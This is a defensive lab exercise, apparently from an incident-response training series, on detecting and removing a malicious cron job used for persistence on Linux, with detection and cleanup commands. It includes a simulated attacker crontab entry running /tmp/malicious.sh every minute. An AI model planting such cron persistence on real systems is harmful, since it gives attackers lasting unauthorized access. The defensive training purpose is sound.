Day 21 – Detecting & Removing Malicious Cron Jobs on Linux

Objective: Learn to find and eliminate unauthorized cron jobs set up by attackers.

Challenge Description: As discovered in Day 19, the attacker used cron for persistence. Now assume another variant where a cron job was planted to run a malicious script every minute. Your task is to locate and remove this cron job and script on the Linux system. This mirrors real incidents where cron is abused for persistence[18]. Tools: Linux shell, commands like grep, crontab -l, text editor. Check system logs (/var/log/syslog or /var/log/cron) for cron activity. Use integrity tools (e.g. auditctl or inotify) if available to monitor changes.

Steps to Solve: 1. List cron jobs: Run crontab -l for each user (and sudo crontab -l for root). Also check files under /etc/cron.* and /var/spool/cron/. Look for unexpected entries, especially those running scripts in /tmp or hidden files. 2. Search for anomalies: Use grep -r "/tmp/" /etc/cron* /var/spool/cron to quickly find cron jobs referencing temporary directories (a common red flag)[21]. 3. Verify cron service and logs: Ensure cron daemon is running (systemctl status cron). Review /var/log/syslog or /var/log/cron for recent job executions. For example: grep CRON /var/log/syslog to find timestamps of job runs. 4. Confirm script execution: If the cron job runs a script (e.g. /tmp/malicious.sh), check for evidence such as a log file or process. In our lab, suppose /tmp/.cron.log contains repetitive output (as per the script’s behavior). 5. Remove malicious cron entry: Edit the affected user’s crontab (e.g. sudo crontab -u root -e) and delete the line referring to the malicious script (or run crontab -l | grep -v malicious.sh | crontab -). Verify with crontab -l that it’s gone. 6. Delete malicious script and cleanup: Remove the script and related files (rm /tmp/malicious.sh /tmp/.cron.log). Restart cron (systemctl restart cron) to apply changes. 7. Harden defenses: Optionally, set up file integrity monitoring on cron directories or alerts on new cron entries using tools like auditd or inotify.

Simulated Lab: You run grep -r "/tmp/" /var/spool/cron and find an entry in root’s crontab: * * * * * /tmp/malicious.sh. Viewing /tmp/malicious.sh shows it appends “Ping from attacker” to /tmp/.cron.log each run. Checking /tmp/.cron.log, you see timestamps every minute, confirming the job is active.

To remove it, execute:

sudo crontab -l | grep -v malicious.sh | sudo crontab - # remove malicious line sudo rm -f /tmp/malicious.sh /tmp/.cron.log # delete script and log sudo systemctl restart cron # restart cron daemon

After this, crontab -l shows no malicious jobs and /tmp/.cron.log is deleted. You also check /var/log/syslog for “malicious.sh” entries to find when the job ran.

Key Citations: Cron jobs are often used by attackers for persistence. They are legitimate scheduled tasks that run at intervals[22], so reviewing cron configurations can reveal unauthorized scripts set to execute periodically[18]. Always inspect both user and system cron directories (/var/spool/cron/, /etc/cron.*) and use logging (/var/log/syslog) to detect suspicious entries.

Sources: Information in these labs is based on best practices and recent research in phishing and incident response[23][24][9][12][13][15][20][19][22][1]. These sources provide guidance on email authentication (SPF/DKIM), phishing analysis, IR lifecycle, Linux forensic artifacts, PowerShell logging, and cron abuse.